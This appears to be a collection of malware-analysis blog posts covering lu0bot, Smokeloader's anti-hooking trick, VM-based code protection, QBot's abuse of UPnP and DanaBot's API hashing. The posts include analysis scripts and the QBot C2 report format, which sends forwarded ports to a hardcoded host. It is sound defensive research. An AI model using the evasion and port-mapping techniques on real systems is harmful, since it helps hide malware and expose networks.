8d8b195551febba6dfe6a516e0ed0f105e71cf8df08d144b45cdee13d06238ed  response1.bin
214f90bf2a6b8dffa8dbda4675d7f0cc7ff78901b3c3e03198e7767f294a297d  response2.bin
c406fbef1a91da8dd4da4673f7a1f39d4b00fe28ae086af619e522bc00328545  response3.bin

ccd7dcdf81f4acfe13b2b0d683b6889c60810173542fe1cda111f9f25051ef33  Intel MEC 246919961
e673547a445e2f959d1d9335873b3bfcbf2c4de2c9bf72e3798765ad623a9067  Intel MEC 750293792

Example of lu0bot interaction


ko
{ pid: 'XXXXXX',
  aid: '5.188.206.211 19584',
  q: XXXXXXXXXX, 
  t: XXXXXXXXXXXXX,
  lq: 
   { ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 30 00 00 00 00 09 00 00 26 02> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 74 72 75 65> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 74 72 75 65> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 37 39 38> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 37 39 38> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ] },
  pk: 'BASE64_ENCRYPTED',
  k: <Buffer 3c 60 22 73 97 cc 76 22 bc eb b5 79 46 3d 05 9e>,
  mp: 
   { XXXXXXXXXXXX: 
      { id: 'XXXXXXXXXXXX',
        pid: 'XXXXXXX',
        gen: XXXXXXXXXXXXX,
        last: XXXXXXXXXXXXX,
        tmr: [Object],
        p: {},
        psz: 1163,
        btotal: 0,
        type: 'download',
        hn: 'bufread',
        target: 'binit',
        fp: <Buffer 1f 8b 08 00 00 00 00 00 00 0b 95 54 db 8e 9b 30 10 fd 95 c8 4f ad 44 91 31 c6 80 9f 9a 26 69 1b 29 9b 8d b2 59 f5 a1 54 91 81 a1 41 21 18 61 92 6d bb c9 ...>,
        size: 798,
        fcb: [Function],
        rcb: [Function],
        interval: 200,
        last_sev: XXXXXXXXXXXXX,
        stmr: false },
     XXXXXXXXXXXX: 
      { id: 'XXXXXXXXXXXX',
        pid: 'XXXXXXX',
        gen: XXXXXXXXXXXXX,
        last: XXXXXXXXXXXXX,
        tmr: [Object],
        p: {},
        psz: 1163,
        btotal: 0,
        type: 'download',
        hn: 'bufread',
        target: 'binit',
        fp: <Buffer 1f 8b 08 00 00 00 00 00 00 0b 95 54 db 8e 9b 30 10 fd 95 c8 4f ad 44 91 31 c6 80 9f 9a 26 69 1b 29 9b 8d b2 59 f5 a1 54 91 81 a1 41 21 18 61 92 6d bb c9 ...>,
        size: 798,
        fcb: [Function],
        rcb: [Function],
        interval: 200,
        last_sev: XXXXXXXXXXXXX,
        stmr: false },
     XXXXXXXXXXXX: 
      { id: 'XXXXXXXXXXXX',
        pid: 'XXXXXXX',
        gen: XXXXXXXXXXXXX,
        last: XXXXXXXXXXXXX,
        tmr: [Object],
        p: {},
        psz: 1163,
        btotal: 0,
        type: 'download',
        hn: 'bufread',
        target: 'binit',
        fp: <Buffer 1f 8b 08 00 00 00 00 00 00 0b 95 54 db 8e 9b 30 10 fd 95 c8 4f ad 44 91 31 c6 80 9f 9a 26 69 1b 29 9b 8d b2 59 f5 a1 54 91 81 a1 41 21 18 61 92 6d bb c9 ...>,
        size: 798,
        fcb: [Function],
        rcb: [Function],
        interval: 200,
        last_sev: XXXXXXXXXXXXX,
        stmr: false },
     XXXXXXXXXXXX: 
      { id: 'XXXXXXXXXXXX',
        pid: 'XXXXXXX',
        gen: XXXXXXXXXXXXX,
        last: XXXXXXXXXXXXX,
        tmr: [Object],
        p: {},
        psz: 1163,
        btotal: 0,
        type: 'download',
        hn: 'bufread',
        target: 'binit',
        fp: <Buffer 1f 8b 08 00 00 00 00 00 00 0b 95 54 db 8e 9b 30 10 fd 95 c8 4f ad 44 91 31 c6 80 9f 9a 26 69 1b 29 9b 8d b2 59 f5 a1 54 91 81 a1 41 21 18 61 92 6d bb c9 ...>,
        size: 798,
        fcb: [Function],
        rcb: [Function],
        interval: 200,
        last_sev: XXXXXXXXXXXXX,
        stmr: false },
     XXXXXXXXXXXX: 
      { id: 'XXXXXXXXXXXX',
        pid: 'XXXXXXX',
        gen: XXXXXXXXXXXXX,
        last: XXXXXXXXXXXXX,
        tmr: [Object],
        p: {},
        psz: 1163,
        btotal: 0,
        type: 'download',
        hn: 'bufread',
        target: 'binit',
        fp: <Buffer 1f 8b 08 00 00 00 00 00 00 0b 95 54 db 8e 9b 30 10 fd 95 c8 4f ad 44 91 31 c6 80 9f 9a 26 69 1b 29 9b 8d b2 59 f5 a1 54 91 81 a1 41 21 18 61 92 6d bb c9 ...>,
        size: 798,
        fcb: [Function],
        rcb: [Function] } },
  h: 
   { eval: [Function],
     bufwrite: [Function],
     bufread: [Function],
     filewrite: [Function],
     fileread: [Function] },
  mp_pget: [Function],
  mp_pget_ev: [Function],
  mp_new: [Function: mp_new],
  mp_get: [Function: mp_get],
  mp_count: [Function: mp_count],
  mp_loss: [Function: mp_loss],
  mp_del: [Function: mp_del],
  mp_dtchk: [Function: mp_dtchk],
  mp_dtsum: [Function: mp_dtsum],
  mp_pset: [Function: mp_pset],
  mp_opnew: [Function: mp_opnew],
  mp_opstat: [Function: mp_opstat] }
lq
{ ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 30 00 00 00 00 09 00 00 26 02> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 74 72 75 65> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 74 72 75 65> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 37 39 38> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 37 39 38> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ] 
}

MITRE ATT&CK

  • T1059
  • T1482
  • T1083
  • T1046
  • T1057
  • T1518
  • T1082
  • T1614
  • T1016
  • T1124
  • T1005
  • T1008
  • T1571

ELI5 summary

  • lu0bot is a NodeJS malware.
  • Network communications mix TCP (loader) and UDP (main stage).
  • It is distributed at least through Garbage Cleaner.
  • Its default setup seems to be an aggressive telemetry harvester.
  • Due to its task manager architecture, it can technically be turned into anything.

Conclusion

Lu0bot is a curious piece of code. I have to admit that, even though I don’t like NodeJS/JavaScript code at all, the task manager succeeded in blowing my mind with its ingenuity.

A wild fumik0_ being amazed by the task manager implementation

I have had more questions than answers ever since I started to put my hands on this one, but the one thing I’m sure of is that it’s active and harvesting data from bots more aggressively than anything I have seen before.

Special thanks: @benkow_

Examining Smokeloader’s Anti Hooking technique

24 May 2020 at 09:22

Hooking is a technique to intercept function calls/messages or events passed between software, or in this case malware. The technique can be used for malicious, as well as defensive cases.

Rootkits for example can hook API calls to make themselves invisible from analysis tools, while we as defenders can use hooking to gain more knowledge of malware or build detection mechanisms to protect customers.

Cybersecurity continues to be a game of cat and mouse, and while we try to build protections, blackhats will always try to bypass these protection mechanisms. Today I want to show you how SmokeLoader bypasses hooks on ntdll.dll and how Frida can be used to hook library functions.

The bypass has already been explained in a blog article from Checkpoint[1] written by Israel Gubi. It covers a lot more than I do regarding Smokeloader, so it is definitely worth reading too.

Hooking with Frida

If you’ve read my previous blog articles about QBot, you are familiar with the process iteration and AV detection[3]. It iterates over processes and compares the process name with entries in a black list containing process names of common AV products. If one process name matches with an entry, QBot quits its execution.
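The check described above boils down to one case-insensitive string comparison per running process. Here is a minimal Python sketch of that logic. The black list entries are hypothetical placeholders, not QBot’s real list:

```python
def first_blacklisted(process_names, blacklist):
    """Return the first process name found in the black list, or None.

    The comparison is case-insensitive, mirroring what lstrcmpiA does.
    """
    lowered = {entry.lower() for entry in blacklist}
    for name in process_names:
        if name.lower() in lowered:
            return name
    return None


# Placeholder entries for illustration only (hypothetical names).
EXAMPLE_BLACKLIST = ["avexample.exe", "scanner_demo.exe"]
running = ["explorer.exe", "AVExample.EXE", "notepad.exe"]
hit = first_blacklisted(running, EXAMPLE_BLACKLIST)
```

Hooking the comparison function, as done below, reveals the real entries without having to reverse how the list is stored.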

Frida is a Dynamic Instrumentation Toolkit which can be used to write dynamic analysis scripts in high level languages, in this case JavaScript. If you want to know more about this technology, I advise you to visit this website[4] and read its documentation.

We can write a small Frida script to hook the lstrcmpiA function in order to investigate which process names are in the black list.

import sys

import frida


def main():
    """Main."""
    # argv[1] is our malware sample
    pid = frida.spawn(sys.argv[1])
    sess = frida.attach(pid)
    script = sess.create_script("""
        console.log("[+] Starting Frida script")
        // static address, only valid while ASLR is disabled
        var lstrcmpiA = ptr("0x76B43E8E")
        console.log("[+] Hooking lstrcmpiA at " + lstrcmpiA)
        Interceptor.attach(lstrcmpiA, {
            onEnter: function(args) {
                console.log("[+][+] Called strcmpiA");
                console.log("[+][+] Arg1Addr = " + args[0]);
                console.log("[+][+] Buffer");
                pretty_print(args[0], 0x30);
                console.log("[+][+] Arg2Addr = " + args[1]);
                console.log("[+][+] Buffer");
                pretty_print(args[1], 0x30);
            },
            onLeave: function(retval) {
                console.log("[+][+] Returned from strcmpiA")
            }
        });

        function pretty_print(addr, sz) {
            var bufptr = ptr(addr);
            var bytearr = Memory.readByteArray(bufptr, sz);
            console.log(bytearr);
        };

        """)
    script.load()
    frida.resume(pid)
    # keep the script alive until stdin is closed
    sys.stdin.read()
    sess.detach()


if __name__ == "__main__":
    main()

We attach to the malicious process and hook the lstrcmpiA function at a static address. When analysing malware, we have (most of the time) the privilege to control and adjust our environment as much as we want. If you turn off ASLR and use snapshots, using Frida with static pointers is pretty convenient, because most functions will always have the same address. However, it’s also possible to calculate the addresses dynamically. lstrcmpiA has 2 arguments, which are both pointers of type LPCSTR. So we just resolve the pointers, read 0x30 bytes starting at the pointer address into a ByteArray and print it.

Result of Frida Script

Smokeloader’s Anti Hooking technique

So how does Smokeloader bypass hooks? Well, it can do so at least for the ntdll.dll library. During execution Smokeloader retrieves the Temp folder path and generates a random name. If a file with the generated name already exists in the temp folder, it is deleted with DeleteFileW.

drltrace output DeleteFileW call, deleting 9A26.tmp in Temp Folder

Next the original ntdll.dll file is copied from system32 to the temp folder with the exact name it just generated. This leads to a copy of this mentioned library being placed in the temp directory.

Meta data of disguised ntdll.dll
Export functions of the disguised ntdll file

Instead of loading the real ntdll.dll file, the copy is loaded into memory by calling LdrLoadDll.

9A26.tmp as ntdll.dll

Most AV vendors and analysts have probably implemented their hooks on the original ntdll.dll, so calls going through the copied ntdll.dll file will be missed.

Smokeloader continues to call functions from this copied DLL, for example NtQueryInformationProcess to detect whether a debugger is attached to it.
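The file handling part of this trick (random name, delete if present, copy) can be reproduced harmlessly to see what artefacts it leaves behind. The following Python sketch works on a stand-in file in a throwaway directory. The four-hex-digit name format is an assumption based on the 9A26.tmp example above, and the function names are mine:

```python
import os
import random
import shutil
import tempfile


def stage_copy(source_path, temp_dir, rng=random):
    """Copy source_path into temp_dir under a random XXXX.tmp name.

    A file that already carries the generated name is deleted first.
    Returns the path of the copy.
    """
    name = "%04X.tmp" % rng.randrange(0x10000)  # name format is an assumption
    target = os.path.join(temp_dir, name)
    if os.path.exists(target):
        os.remove(target)                 # counterpart of DeleteFileW
    shutil.copyfile(source_path, target)  # counterpart of the file copy
    return target


def demo():
    """Run the staging steps on a harmless stand-in file."""
    with tempfile.TemporaryDirectory() as workdir:
        source = os.path.join(workdir, "library.bin")  # stand-in, not ntdll.dll
        with open(source, "wb") as handle:
            handle.write(b"stand-in content")
        copy_path = stage_copy(source, workdir)
        with open(copy_path, "rb") as handle:
            return os.path.basename(copy_path), handle.read()
```

From a detection point of view, the interesting event is probably not the copy itself but a later image load of a .tmp file whose content matches a system library.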

Final Words

While analysing SmokeLoader at work, I stumbled across this AntiHook mechanism, which I hadn’t seen before, so I wanted to share it here :-).

I’ve also only scratched the surface of what Frida is capable of. I might work on something more complex next time.

Taming Virtual Machine Based Code Protection – 1

7 June 2020 at 09:09

Overcoming obfuscation in binaries has always been an interesting topic for me, especially in combination with malware. Over the last weeks I’ve been playing around with Virtualised Code Protection in order to see how well I could handle it.

I decided to download a simple crack-me challenge which is obfuscated with this technique. It takes me some time to reverse everything, so there will be at least 2 blog articles about my little project.

Challenge from crackmes.de

Virtualised Code Protection

Each architecture has a defined instruction set. By looking up which instruction corresponds to which bytes, we are able to translate these bytes into disassembly. The unit that actually executes these bytes is the CPU.

Virtual machine based code protection emulates a processor and thus replaces our usual instruction set with a custom one. So in order to really understand what a virtual machine hardened binary is doing on a low level basis, we need to reverse the virtual machine first. This means we have to understand the custom instruction set.

I want to show you a practical example of what such a custom instruction can look like and how it can be discovered.

Practical Example

Preparing the virtual machine

The challenge demands a serial key and a username. Both of them need certain values for the serial key to be valid. After entering a username and a serial key, the lengths of both are checked first.

At the bottom of this routine, we can already spot 2 interesting functions and operations which push the success or failure message onto the stack.

Preparing the virtual machine and jumping to the serial key check

The function InitialiseVM is where it gets interesting for us. If you just look quickly through the disassembly in the figure below, you will see that there are multiple buffers allocated and static values written into an internal structure. Furthermore it is filled with function pointers. Each one of those functions represents a custom instruction. This routine is used to allocate the virtual address space our virtual machine will use for emulation, as well as a table to select custom instructions from.

InitialiseVM function

Next is the CheckSerial function, which implements the virtual machine loop that emulates the virtual processor unit.

Virtual machine loop at the bottom

In the block at loc_4015E5 the function sub_4013DF is executed each iteration. Afterwards the byte which the address in ESI+0x7C points to is used to calculate the dynamic call at the end of the current block we are talking about (call dword ptr [esi+eax*4+80h]). In other words, this byte decides which custom instruction is executed. Before we look at how some of the opcodes are actually parsed here, let’s review what the virtualised address space of this VM looks like.
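To make the loop structure more tangible, here is a minimal Python sketch of a fetch-and-dispatch loop of the same shape: one byte selects a handler from a table, and the handler does the work. The two instructions and all names are hypothetical and have nothing to do with the crackme’s real instruction set:

```python
def run_vm(bytecode, handlers, max_steps=1000):
    """Fetch-and-dispatch loop of a toy VM.

    state["ip"] is the virtual instruction pointer. Each handler receives
    the state and the bytecode and must advance state["ip"] itself.
    """
    state = {"ip": 0, "halted": False, "trace": []}
    steps = 0
    while not state["halted"] and state["ip"] < len(bytecode) and steps < max_steps:
        opcode = bytecode[state["ip"]]     # the byte that selects the handler
        handlers[opcode](state, bytecode)  # same idea as call [esi+eax*4+80h]
        steps += 1
    return state


# Hypothetical instruction set, for illustration only.
def op_nop(state, bytecode):
    state["trace"].append("nop")
    state["ip"] += 1


def op_halt(state, bytecode):
    state["trace"].append("halt")
    state["halted"] = True


HANDLERS = {0: op_nop, 1: op_halt}
result = run_vm(bytes([0, 0, 1, 0]), HANDLERS)
```

Recovering the real handler table is the main reversing effort: once each entry is understood, the opcode buffer can be disassembled like any other instruction stream.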

Overview of the current vm address space

Executing custom instructions

The function sub_4013DF is called each iteration and reads bytes from the buffer which contains opcodes for custom instructions. The first instruction has a size of 5 bytes, and each of these bytes is used by the virtual machine to translate the opcode into a valid operation. At the time of writing this article, I have not fully explored this function yet. However, I am confident that the last 2 bytes of an instruction are used to influence registers.

Upon returning from this function, the program takes the first byte of the ESI+0x7C structure and uses it to determine which function from the previously allocated function table is called. The first run returns EAX=3, so we are dealing with the custom instruction with instruction id 3.

Let’s jump into our first custom instruction.

Overview of function representing instruction id 3

The function sub_401271 has 31 XRefs and is used in every function from the function table. Before the function is called, the pointer to ESI+7C, our 0x24 buffer holding the custom opcodes, is retrieved. 0xC is added, which means we are pointing at the byte at ESI+7C+0xC, the 4th DWORD in this buffer.

The routine accesses the third byte of the current opcode and is responsible for determining the instruction type. The first four bits decide whether it is an instruction utilizing 2 registers, a memory read or moving an immediate value into a register. The second 4 bits influence the size of the value that will be moved around. These 4 bits are zero extended into bytes.
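Splitting a byte into its two 4-bit halves is a one-liner each. The sketch below assumes that "the first four bits" means the upper nibble, which I have not verified against the binary. The function name is hypothetical:

```python
def split_type_byte(value):
    """Split one byte into (instruction_type, operand_size) nibbles.

    Assumption: the "first four bits" are the upper nibble.
    """
    if not 0 <= value <= 0xFF:
        raise ValueError("expected a single byte")
    instruction_type = (value >> 4) & 0xF  # upper nibble
    operand_size = value & 0xF             # lower nibble, zero extended
    return instruction_type, operand_size
```

For example, under this assumption the byte 0x24 would decode to type 2 and size selector 4.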

Take a look at the figure below. The result of our InstrType function is saved in ebp+0x4. Next the memory address which ESI+0x20 points at is decreased and filled with the value we just computed. Doesn’t this look familiar ? The stack is also decreased if we put data onto it.

Block decreasing the virtual stack and writing the result into it

It seems that the custom instruction we just investigated is a custom PUSH instruction. ESI+0x20 points to the virtual stack that is emulated by this virtual machine. Since the pointer at ESI+0x4C is increased here after an instruction, it might hold the virtual instruction pointer.
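The behaviour observed here (decrease the stack pointer, write the value, advance the instruction pointer) can be modelled in a few lines of Python. This is a sketch under assumptions: the 4-byte slot size and the little-endian layout are guesses, and the 5-byte instruction length is taken from the first instruction described above:

```python
import struct


class ToyVM:
    """Toy VM state: flat memory, a stack pointer and an instruction pointer."""

    def __init__(self, memory_size=64):
        self.memory = bytearray(memory_size)
        self.sp = memory_size  # stack grows downwards, starts at the top
        self.ip = 0

    def push(self, value, instruction_length=5):
        """Decrease the stack pointer, store a 32-bit value, advance ip."""
        self.sp -= 4  # slot size is an assumption
        struct.pack_into("<I", self.memory, self.sp, value & 0xFFFFFFFF)
        self.ip += instruction_length


vm = ToyVM()
vm.push(0x11223344)
```

In the real binary the roles of sp and ip are played by the pointers at ESI+0x20 and ESI+0x4C.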

So far we figured out what the first 3 opcodes do and we have an idea what the last 2 ones are responsible for. In order to give a proper answer on how they are used, we need to look at more than just 1 virtual instruction execution.

Final thoughts regarding opcodes

Conclusion

So it just took me a complete blog article to really explain how to reverse a single custom instruction of a binary hardened with Virtualised Code Protection ;-). As you can see, this kind of software protection is very powerful.

I will finish this challenge for sure and will write a second blog article about how I solved it.

UpnP – Messing up Security since years

21 June 2020 at 08:01

UpnP is a set of networking protocols to permit network devices to discover each other’s presence on a network and establish services for various functionalities.
Too lazy to port forward yourself ? Just enable UpnP to automatically establish working configurations with devices! Dynamic device configuration like this makes our life more comfortable for sure. Sadly it also comes with many security issues.

In this blog article I cover the stages of the UpnP protocol, give a quick introduction to security issues regarding UpnP and show how QBot abuses the UpnP protocol to exploit devices as proxy C2 servers.

UpnP in a nutshell

UpnP makes use of common networking protocols and stacks HTTP, SOAP and XML on top of the IP protocol in order to provide a variety of functionalities for users. Without going too deep into how UpnP works in detail, the following figure is enough for the basics.

Quick explanation of existing stages in UpnP protocol

Some services a node with UpnP enabled can offer (it really depends on the device):

  • Port forwarding
  • Switching power on and off for light bulbs
  • etc.

This is very high level of course. If you are interested in everything about UpnP, I recommend you to check out Wikipedia[1] for a high level introduction or read this report that goes more into detail[2].

For the following content of this blog article, only the first three stages are really relevant.

IoT Security and UpnP

Misconfiguration

Again, while it might be very convenient for customers to have devices autoconfigure themselves, it leads to huge security risks.

Many routers have UpnP enabled by default. Think of misconfigured IoT devices that send a command to port forward a specific port, leading to a port exposure to the internet.

It is known that many IoT devices contain awful security flaws like default credentials for telnet. If devices like this have such misconfigurations and expose their telnet port to the outside, it probably takes about 5 minutes till some script kiddie adds them to their botnet.

Exploitation

A blog post from TrendMicro[3] previously mentioned that many devices still use very old UpnP libraries which are not up to date with current security standards. This creates a larger attack surface for attackers. The newest vulnerability is CallStranger.

source : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12695

It is caused by the Callback header value in the UpnP SUBSCRIBE function. This field can be controlled by an attacker and enables a Server Side Request Forgery like vulnerability. It can be used for the following malicious cases:

  • Exfiltrate data
  • Scan networks
  • Force nodes to participate in DDoS attacks
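
Since the root cause is an unchecked callback URL, one defensive idea is to only accept callbacks that stay inside the local network. The Python sketch below is my own illustration of such a check, not code from any UpnP stack. It expects the URL with the surrounding angle brackets of the Callback header already stripped:

```python
import ipaddress
from urllib.parse import urlparse


def callback_is_local(callback_url):
    """Return True if the callback URL points at a private or link-local IP literal."""
    host = urlparse(callback_url).hostname
    if host is None:
        return False
    try:
        address = ipaddress.ip_address(host)
    except ValueError:
        return False  # hostnames are rejected here rather than resolved
    return address.is_private or address.is_link_local
```

A stricter variant would compare the address against the subnet of the interface the SUBSCRIBE request arrived on.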

I recommend visiting the official domain[4] of this vulnerability if you want to learn more about it.

UpnP abused by QBot

Security risks created by UpnP are not limited to the IoT landscape of course.

Another method to use UpnP for malicious cases is to install Proxy C2 servers on devices which have the mentioned protocol enabled, like QBot does for example. Let’s take a look at how this is done.

Diving into QBot’s UpnP proxy module

This technique was first discovered by McAfee[4] in 2017. First QBot starts scanning for devices which have UpnP enabled and are one of the following device types:

  • urn:schemas-upnp-org:device:InternetGatewayDevice:1
  • urn:schemas-upnp-org:service:WANIPConnection:1
  • urn:schemas-upnp-org:service:WANPPPConnection:1
  • upnp:rootdevice

Disassembly of strcmp calls to check for device type

If you are using INETSIM for malware analysis, you will probably realise that it does not offer any functionality to fake a SSDP or UpnP service in any way. However, we can use this python script[5] by user GrahamCobb which emulates a fake SSDP service and adjust the device description to suit our needs.

Once the devices are discovered, it sends requests for device descriptions and checks whether it deals with an internet gateway device. This can be determined by looking at the device description itself.

Capture SSDP traffic, showing the MSEARCH request and retrieval of the device description
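
For reference, an SSDP discovery request is a small HTTP-like message sent over UDP to the multicast address 239.255.255.250 on port 1900. The following Python sketch only builds such a datagram and does not send anything. The function name and the MX value are my choices:

```python
SSDP_ADDR = "239.255.255.250"
SSDP_PORT = 1900


def build_msearch(search_target, mx=2):
    """Build an SSDP M-SEARCH datagram for the given search target (ST)."""
    lines = [
        "M-SEARCH * HTTP/1.1",
        "HOST: %s:%d" % (SSDP_ADDR, SSDP_PORT),
        'MAN: "ssdp:discover"',
        "MX: %d" % mx,  # maximum seconds a device may wait before answering
        "ST: %s" % search_target,
        "",
        "",
    ]
    return "\r\n".join(lines).encode("ascii")


packet = build_msearch("urn:schemas-upnp-org:device:InternetGatewayDevice:1")
```

Sending it would be a matter of calling sendto(packet, (SSDP_ADDR, SSDP_PORT)) on a UDP socket. That part is left out so the sketch has no network side effects.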

If it is an internet gateway device, it confirms whether a connection exists by sending a GetStatusInfo followed by retrieving the external ip address of this device by sending the GetExternalIPAddress command.

Next it tries to use the AddPortMapping command to add port forwarding rules to the device.

Port forwarding command sent to fake SSDP service
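
An AddPortMapping command is a SOAP request sent to the control URL of the WANIPConnection service. The Python sketch below builds the headers and the body with the standard argument names of that action. The function names and the example values are mine and are not taken from QBot:

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

SERVICE = "urn:schemas-upnp-org:service:WANIPConnection:1"


def build_add_port_mapping(external_port, internal_port, internal_client,
                           protocol="TCP", description="example", lease=0):
    """Return (headers, body) for a SOAP AddPortMapping request."""
    args = [
        ("NewRemoteHost", ""),
        ("NewExternalPort", str(external_port)),
        ("NewProtocol", protocol),
        ("NewInternalPort", str(internal_port)),
        ("NewInternalClient", internal_client),
        ("NewEnabled", "1"),
        ("NewPortMappingDescription", description),
        ("NewLeaseDuration", str(lease)),
    ]
    arg_xml = "".join("<%s>%s</%s>" % (n, escape(v), n) for n, v in args)
    body = (
        '<?xml version="1.0"?>'
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
        's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
        '<s:Body><u:AddPortMapping xmlns:u="%s">%s</u:AddPortMapping></s:Body>'
        '</s:Envelope>' % (SERVICE, arg_xml)
    )
    headers = {
        "Content-Type": 'text/xml; charset="utf-8"',
        "SOAPAction": '"%s#AddPortMapping"' % SERVICE,
    }
    return headers, body


def parse_arguments(body):
    """Parse a request body back into a dict of argument names and values."""
    root = ET.fromstring(body)
    action = root.find(".//{%s}AddPortMapping" % SERVICE)
    return {child.tag: (child.text or "") for child in action}
```

parse_arguments is handy on the analysis side: a fake gateway can use it to log which ports a sample tries to open.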

Afterwards all rules are removed again and the ports which were successfully port forwarded are sent as an HTTP POST to the C2 server.
The carrier protocol is HTTPS and the request has the following form:

# destination address
https://[HARDCODED_IP]:[HARDCODED_PORT]/bot_serv

# POST DATA form, successful port forwarded ports are appended to ports
cmd=1&msg=%s&ports=

From this point on, my analysis stopped for now. However, McAfee explains that a new binary is downloaded from the contacted C2 server, which re-adds the port forwarding rules and is responsible for the C2 communication. The blog article I’ve referenced above explains the whole functionality, so I recommend you to take a look at it, if you are interested in the next steps.

Final Words

As you can see, UpnP contains many security flaws and can lead to a compromised network. If you have UpnP enabled in your company’s network, I really recommend checking whether it is needed and turning it off if it is not.

Exams at university are coming up next, so it will probably take some time until I can get my hands on the QBot C2 protocol or the proxy binary. I do, however, want to look at these two functionalities next.

Deobfuscating DanaBot’s API Hashing

12 July 2020 at 13:27

As you probably guessed from the title, API Hashing is used to obfuscate a binary in order to hide API names from static analysis tools, hindering a reverse engineer from understanding the malware’s functionality.
A first approach to get an idea of an executable’s functionalities is to more or less dive through the functions and look out for API calls. If, for example a CreateFileW function is called in a specific subroutine, it probably means that cross references or the routine itself implement some file handling functionalities. This won’t be possible if API Hashing is used.

Instead of calling the function directly, each API call has a corresponding checksum/hash. A hardcoded hash value might be retrieved and for each library function a checksum is computed. If the computed value matches the hash value we compare it against, we found our target.

API Hashing used by DanaBot
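
The generic lookup described above fits in a few lines of Python. This sketch uses CRC32 purely as a stand-in checksum. It is not DanaBot’s algorithm, and the function names are hypothetical:

```python
import zlib


def stand_in_hash(name):
    """Stand-in checksum (CRC32). This is NOT DanaBot's algorithm."""
    return zlib.crc32(name.encode("ascii")) & 0xFFFFFFFF


def resolve_by_hash(target_hash, export_names, hash_fn=stand_in_hash):
    """Return the first export name whose hash equals target_hash, else None."""
    for name in export_names:
        if hash_fn(name) == target_hash:
            return name
    return None


exports = ["CreateFileW", "ReadFile", "WriteFile", "CloseHandle"]
wanted = stand_in_hash("ReadFile")  # the value a sample would hardcode
resolved = resolve_by_hash(wanted, exports)
```

Only the hash function differs from family to family, so swapping hash_fn for the reversed algorithm is enough to reuse the same lookup.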

In this case a reverse engineer needs to choose a different path to analyse the binary or deobfuscate it. This blog article will cover how the DanaBot banking trojan implements API Hashing and possibly the easiest way to defeat it. The SHA256 of the binary I am dissecting here is added at the end of this blog post.

Deep diving into DanaBot

DanaBot itself is a banking trojan that has been around since at least 2018 and was first discovered by ESET[1]. It is worth mentioning that it implements most of its functionalities in plugins, which are downloaded from the C2 server. I will focus on deobfuscating API Hashing in the first stage of DanaBot, a DLL which is dropped and persisted on the system, used to download further plugins.

Reversing the ResolvFuncHash routine

At the beginning of the function, the EAX register stores a pointer to the DOS header of the Dynamic Link Library which contains the function the binary wants to call. The corresponding hash of the yet unknown API function is stored in the EDX register. The routine also contains a pile of junk instructions, obfuscating the actual use case for this function.

